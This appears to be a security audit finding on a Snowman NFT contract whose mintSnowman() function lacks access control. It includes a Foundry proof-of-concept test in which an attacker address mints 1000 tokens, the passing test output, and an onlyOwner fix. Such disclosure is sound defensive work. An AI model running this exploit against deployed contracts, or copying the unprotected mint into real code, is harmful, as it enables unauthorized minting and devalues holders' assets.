Root + Impact
Description
-
The Snowman NFT contract is designed to mint NFTs through a controlled airdrop mechanism where only authorized entities should be able to create new tokens for eligible recipients.
-
The mintSnowman() function lacks any access control mechanisms, allowing any external address to call the function and mint unlimited NFTs to any recipient without authorization, completely bypassing the intended airdrop distribution model.
function mintSnowman(address receiver, uint256 amount) external {
@>
for (uint256 i = 0; i < amount; i++) {
_safeMint(receiver, s_TokenCounter);
emit SnowmanMinted(receiver, s_TokenCounter);
s_TokenCounter++;
}
@>
}
Risk
Likelihood:
-
The vulnerability will be exploited as soon as any malicious actor discovers the contract address, since the function is publicly accessible with no restrictions
-
Automated scanning tools and MEV bots continuously monitor new contract deployments for exploitable functions, making discovery inevitable
Impact:
-
Complete destruction of tokenomics through unlimited supply inflation, rendering all legitimate NFTs worthless
-
Total compromise of the airdrop mechanism, allowing attackers to mint millions of tokens and undermine the project's credibility and economic model
Proof of Concept
pragma solidity ^0.8.24;
import {Test, console2} from "forge-std/Test.sol";
import {Snowman} from "../src/Snowman.sol";
contract SnowmanExploitPoC is Test {
Snowman public snowman;
address public attacker = makeAddr("attacker");
string constant SVG_URI = "data:image/svg+xml;base64,PHN2Zy4uLi4+";
function setUp() public {
snowman = new Snowman(SVG_URI);
}
function testExploit_UnrestrictedMinting() public {
console2.log("=== UNRESTRICTED MINTING EXPLOIT ===");
console2.log("Initial token counter:", snowman.getTokenCounter());
console2.log("Attacker balance before:", snowman.balanceOf(attacker));
vm.prank(attacker);
snowman.mintSnowman(attacker, 1000);
console2.log("Final token counter:", snowman.getTokenCounter());
console2.log("Attacker balance after:", snowman.balanceOf(attacker));
assertEq(snowman.balanceOf(attacker), 1000);
assertEq(snowman.getTokenCounter(), 1000);
console2.log(" EXPLOIT SUCCESSFUL - Minted 1K NFTs without authorization");
}
}
PoC Results:
forge test --match-test testExploit_UnrestrictedMinting -vv
[⠑] Compiling...
[⠢] Compiling 1 files with Solc 0.8.29
[⠰] Solc 0.8.29 finished in 1.45s
Compiler run successful!
Ran 1 test for test/SnowmanExploitPoC.t.sol:SnowmanExploitPoC
[PASS] testExploit_UnrestrictedMinting() (gas: 26868041)
Logs:
=== UNRESTRICTED MINTING EXPLOIT ===
Initial token counter: 0
Attacker balance before: 0
Final token counter: 1000
Attacker balance after: 1000
EXPLOIT SUCCESSFUL - Minted 1K NFTs without authorization
Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 4.28ms (3.58ms CPU time)
Ran 1 test suite in 10.15ms (4.28ms CPU time): 1 tests passed, 0 failed, 0 skipped (1 total tests)
Recommended Mitigation
Adding the onlyOwner modifier restricts the mintSnowman() function to only be callable by the contract owner, preventing unauthorized addresses from minting NFTs.
- function mintSnowman(address receiver, uint256 amount) external {
+ function mintSnowman(address receiver, uint256 amount) external onlyOwner {
for (uint256 i = 0; i < amount; i++) {
_safeMint(receiver, s_TokenCounter);
emit SnowmanMinted(receiver, s_TokenCounter);
s_TokenCounter++;
}
}
